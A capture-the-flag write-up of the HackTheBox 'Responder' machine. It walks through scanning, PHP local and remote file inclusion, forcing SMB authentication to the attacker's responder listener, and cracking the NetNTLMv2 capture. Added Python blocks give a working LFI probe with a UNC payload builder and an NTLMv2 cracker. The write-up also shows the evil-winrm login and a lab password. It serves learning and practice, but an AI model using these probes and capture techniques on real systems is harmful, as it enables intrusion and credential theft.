Responder offers a nice intro to some basic exploits and techniques, but I’ll need to do some patching and reconnecting to make progress.
After finding a website being served over HTTP, I’ll look at how the site loads its different language versions via a URL parameter. Local/Remote File Inclusion (LFI/RFI) vulnerabilities in that parameter will then allow me to read files which should never have been publicly accessible.
The main focus of the box, however, isn’t the website, it’s the service running on the other port. I’ll leverage the RFI to make the target authenticate to my machine over SMB, capture the NetNTLMv2 challenge/response it sends, and crack it to recover a password, which will give me a foothold.
After authenticating as an admin, I’ll have easy access to uncover the flag in another user’s home directory.
nmap shows me two open TCP ports:
sam@kali$ nmap -p- -Pn --min-rate 10000 10.129.138.195 | tee responder-nmap-01.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 21:35 GMT
Nmap scan report for 10.129.138.195
Host is up (0.039s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
No surprises to see port 80 open for HTTP, and adminsub.net sheds a little more light on port 5985: it’s used for Web Services for Management (WS-Management), “a public standard for remotely exchanging management data with any computer device that implements the protocol.”
nmap again, this time with the default scripts (-sC) and version detection (-sV) enabled, to try and dig deeper into what’s listening on these ports.
sam@kali$ nmap -p 80,5985 -sCV 10.129.138.195 | tee responder-nmap-02.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 21:44 GMT
Nmap scan report for 10.129.138.195
Host is up (0.042s latency).
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Unika
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.43 seconds
I can see this is a Windows box running the Apache web server on port 80, along with OpenSSL, and PHP as the scripting language.
I want to learn more about this Microsoft HTTPAPI (SSDP/UPnP). I recognise UPnP as Universal Plug and Play, which is commonly associated with online gaming and has a long history of vulnerabilities. The SSDP/UPnP label, though, is only nmap’s closest fingerprint match for the Microsoft-HTTPAPI/2.0 server header: that header belongs to HTTP.sys, the kernel-mode HTTP listener shared by several Windows services, and on port 5985 it is fronting something else entirely (see the wsman section below).
I’m going to add the target IP to my /etc/hosts file, then open up a browser to see what’s being served on port 80.
sam@kali$ echo "10.129.138.195 responder" | sudo tee -a /etc/hosts
Website, TCP 80
Visiting http://responder, I’m immediately redirected to http://unika.htb. Before looking into the redirect, I’ll update my hosts file with the new domain and run dirb against it to brute-force directory and file names, to see if anything interesting turns up.
Brute-forcing paths with dirb
sam@kali$ dirb http://unika.htb /usr/share/wordlists/dirb/big.txt | tee responder-dirb-01.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jan 31 21:51:24 2023
URL_BASE: http://unika.htb/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://unika.htb/ ----
+ http://unika.htb/aux (CODE:403|SIZE:298)
+ http://unika.htb/cgi-bin/ (CODE:403|SIZE:298)
+ http://unika.htb/com1 (CODE:403|SIZE:298)
+ http://unika.htb/com2 (CODE:403|SIZE:298)
+ http://unika.htb/com3 (CODE:403|SIZE:298)
+ http://unika.htb/com4 (CODE:403|SIZE:298)
+ http://unika.htb/con (CODE:403|SIZE:298)
==> DIRECTORY: http://unika.htb/css/
+ http://unika.htb/examples (CODE:503|SIZE:398)
==> DIRECTORY: http://unika.htb/img/
==> DIRECTORY: http://unika.htb/inc/
==> DIRECTORY: http://unika.htb/js/
+ http://unika.htb/licenses (CODE:403|SIZE:417)
+ http://unika.htb/lpt1 (CODE:403|SIZE:298)
+ http://unika.htb/lpt2 (CODE:403|SIZE:298)
+ http://unika.htb/nul (CODE:403|SIZE:298)
+ http://unika.htb/phpmyadmin (CODE:403|SIZE:417)
+ http://unika.htb/prn (CODE:403|SIZE:298)
+ http://unika.htb/server-info (CODE:403|SIZE:417)
+ http://unika.htb/server-status (CODE:403|SIZE:417)
+ http://unika.htb/webalizer (CODE:403|SIZE:417)
The scan turns up a lot of interesting paths, but most return 403 (Forbidden). The 403s for aux, con, com1, lpt1, nul, prn and friends are a nice confirmation of the OS: those are reserved Windows device names, which Apache on Windows refuses to serve. Of the directories found, the only one that turns out to be browsable is /img, which contains plenty of images but seemingly nothing that will help me.
UNIKA site homepage
There’s nothing special about the site itself, but switching language versions reveals that index.php loads the language-specific HTML page (german.html, for example) via a parameter in the URL.
This leads me to wonder how else I can manipulate the content that gets loaded, using directory traversal and URL manipulation. If I swap out the language-specific HTML page (german.html) for a file path, might I see more than I’m meant to?
Local File Inclusion (LFI)
Bearing in mind this is a Windows box, the paths to try are Windows ones rather than the usual /etc/passwd…
Sure enough, the site is vulnerable to Local File Inclusion (LFI). Later on it will become clear how easily this technique could have read the flag file directly, had I known which path to try.
This wordlist provides many more prospective LFI paths.
wsman, TCP 5985
Turning my attention to the wsman service on port 5985, a bit of browsing leads me to HackTricks, where I learn this port is Windows Remote Management (WinRM), Microsoft’s WS-Management implementation over HTTP. It isn’t so much exploited as used: given a valid username and password it hands out a remote PowerShell session, and evil-winrm is the tool for that. But first I’ll need a username and password.
This machine is called Responder, and Responder is also the name of the next tool I’m going to utilise.
responder lets an attacker on the local network coax Windows hosts into divulging usernames and NTLM challenge/responses. When a hostname can’t be resolved by DNS (because it is deliberately misspelt, say), Windows falls back to LLMNR and NBT-NS and asks the whole subnet who owns the name. responder jumps in, answers those broadcasts claiming to be that host, and then accepts the SMB or HTTP connection that follows, so the victim authenticates to it.
sam@kali$ sudo responder -I tun0
In this case I don’t even need a name-resolution failure: I’ll leverage the same include parameter’s Remote File Inclusion (RFI) by pointing it at a UNC path on my tun0 address (of the form //<my IP>/share). PHP on Windows opens that path through the SMB client, which authenticates to responder’s SMB listener using the account Apache is running as, and responder prints the NetNTLMv2 challenge/response it captures. That should hopefully provide me credentials.
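To make the LFI probing above and the RFI-to-SMB trick repeatable, here is an added example of my own (not code from the write-up): it generates Windows-flavoured traversal payloads for a PHP include()-style parameter, checks the response for a marker that proves a real file came back, and builds the UNC payload that turns the same bug into a NetNTLMv2 capture. The parameter name page, the attacker address 10.10.14.5 and the target file list are assumptions, not details taken from the write-up.

```python
"""Probe a PHP include()-style parameter for LFI on a Windows host and build
the UNC payload that turns the same bug into an SMB authentication (RFI).
Added example; not the write-up's own code. The parameter name "page", the
attacker address and the target-file list below are assumptions."""
import urllib.parse
import urllib.request

BASE_URL = "http://unika.htb/index.php"
PARAM = "page"              # assumption: the language-selector parameter
ATTACKER_IP = "10.10.14.5"  # assumption: the tun0 address responder listens on

# Windows files readable by almost any account, each with a marker string that
# proves the include returned the file rather than a PHP warning page.
TARGETS = {
    "windows/system32/drivers/etc/hosts": "Microsoft Corp.",
    "windows/win.ini": "16-bit app support",
}


def lfi_payloads(target, max_depth=6):
    """Drive-anchored path first (PHP on Windows accepts C:/...), then ../
    chains of increasing depth in both slash styles."""
    yield "C:/" + target
    for depth in range(1, max_depth + 1):
        yield "../" * depth + target
        yield "..\\" * depth + target.replace("/", "\\")


def rfi_unc_payload(ip=ATTACKER_IP, share="share"):
    """UNC path: include() opens it via the SMB client, which authenticates to
    `ip` as the web server's account, so responder there captures NetNTLMv2."""
    return f"//{ip}/{share}"


def build_url(payload):
    return BASE_URL + "?" + urllib.parse.urlencode({PARAM: payload})


def fetch(url, timeout=5):
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe_lfi(fetch_fn=fetch):
    """Return (target, payload) for the first traversal that yields a real
    file, or None. fetch_fn is injectable so the logic runs offline too."""
    for target, marker in TARGETS.items():
        for payload in lfi_payloads(target):
            try:
                body = fetch_fn(build_url(payload))
            except OSError:  # urllib's URLError/HTTPError subclass OSError
                continue
            if marker in body:
                return target, payload
    return None


if __name__ == "__main__":
    print("LFI:", probe_lfi())
    print("RFI/SMB capture URL:", build_url(rfi_unc_payload()))
```

Run probe_lfi() with responder already listening on tun0 and, once a traversal hits, request the RFI URL; the capture shows up in responder's output rather than in the HTTP response.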
Hash cracking with john the ripper
After saving the hash in a text file, I run john against it with the rockyou.txt wordlist, which is always readily available in Kali. Note that what responder captured is a NetNTLMv2 challenge/response, not the account’s NT hash: it can’t be replayed or passed-the-hash, only cracked offline by guessing passwords. The hash is cracked instantly, giving me the password “badminton” for Administrator.
sam@kali$ john --wordlist=/usr/share/wordlists/rockyou.txt responder-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton        (Administrator)
1g 0:00:00:00 DONE (2023-02-02 20:44) 14.28g/s 58514p/s 58514c/s 58514C/s adriano..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
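john’s “NTLMv2 C/R [MD4 HMAC-MD5]” label says exactly what it is doing, and the following added example of my own (not from the write-up, responder or john) reproduces it: the NT hash is MD4 of the UTF-16LE password, the NTLMv2 key is HMAC-MD5 of the upper-cased user plus domain under that hash, and the NTProofStr responder prints is HMAC-MD5 of the server challenge plus the client blob under that key. A candidate password is correct when it reproduces the captured NTProofStr. The sample capture line is constructed here with the domain RESPONDER, a fixed server challenge and a minimal blob, all assumptions; a small pure-Python MD4 is included because hashlib’s MD4 is unavailable on many OpenSSL 3 builds.

```python
"""How john verifies a NetNTLMv2 capture. Added example, not the write-up's
code. NT hash = MD4(UTF-16LE password); NTLMv2 key = HMAC-MD5(NT hash,
upper(user)+domain); NTProofStr = HMAC-MD5(key, server_challenge + blob)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (only needed for the NT hash)."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (  # (mixing function, additive constant, X word order, shifts)
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, k, order, sh in rounds:
            for i in range(16):
                t = _rotl((a + fn(b, c, d) + X[order[i]] + k) & MASK, sh[i % 4])
                a, b, c, d = d, t, b, c  # rotate roles: next step updates old d
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    ident = (user.upper() + domain).encode("utf-16le")
    return hmac.new(nt_hash(password), ident, hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def responder_line(user, domain, server_challenge, proof, blob) -> str:
    """USER::DOMAIN:challenge:NTProofStr:blob, the format responder prints and john reads."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_responder_line(line: str):
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, wordlist):
    """Return the first candidate that reproduces the captured NTProofStr."""
    user, domain, chal, proof, blob = parse_responder_line(line)
    for cand in wordlist:
        if hmac.compare_digest(nt_proof(cand, user, domain, chal, blob), proof):
            return cand
    return None


def sample_capture(password="badminton", user="Administrator", domain="RESPONDER"):
    """Constructed capture: domain, server challenge, timestamp and client
    challenge are made up for this example (assumptions, not real values)."""
    server_challenge = bytes.fromhex("1122334455667788")
    blob = (b"\x01\x01" + b"\x00" * 6                 # NTLMv2 response type + reserved
            + struct.pack("<Q", 0x01D8345A1B2C3D4E)   # FILETIME timestamp
            + bytes.fromhex("aabbccddeeff0011")       # client challenge
            + b"\x00" * 4                             # reserved
            + b"\x00" * 4)                            # AV_PAIR list: MsvAvEOL only
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return responder_line(user, domain, server_challenge, proof, blob)


if __name__ == "__main__":
    line = sample_capture()
    print(line)
    print("cracked:", crack(line, ["password", "letmein", "badminton"]))
```

The capture never contains the NT hash itself, which is why the only attack on it is guessing: each candidate costs an MD4 plus two HMAC-MD5s, cheap enough for john to test tens of thousands of rockyou entries per second on a laptop.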
For whatever reason, ruby was installed in my Kali VM but needed to be “compiled with readline support”, which apparently it wasn’t, so I had to follow this guide. I then found I had to reconnect to the target over TCP before evil-winrm would work on the target.
sam@kali$ evil-winrm -i 10.129.138.195 -u Administrator -p badminton

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
I cd to C:\Users to start looking around. There isn’t much to be found under Administrator, so I’ll try the user mike instead.
*Evil-WinRM* PS C:\Users> cd "C:/Users/"
*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/9/2022   5:35 PM                Administrator
d-----          3/9/2022   5:33 PM                mike
d-r---        10/10/2020  12:37 PM                Public
Sure enough, the flag is found on mike’s Desktop.
*Evil-WinRM* PS C:\Users> ls "C:/Users/mike/Desktop/"

    Directory: C:\Users\mike\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt

*Evil-WinRM* PS C:\Users> cat "C:/Users/mike/Desktop/flag.txt"
ea81b7afddd03efaa09453##########
Despite being a ‘Very Easy’ machine, unexpected issues and challenges can crop up when you least expect them, such as the need to patch ruby before I could use evil-winrm, and having to reconnect with OpenVPN using TCP instead of UDP.
These gotchas can be frustrating, especially for beginners (including myself), but as usual it always helps to consult the internet. In almost all cases, someone else has run into the same issue, and the solution can sometimes be simpler than first anticipated.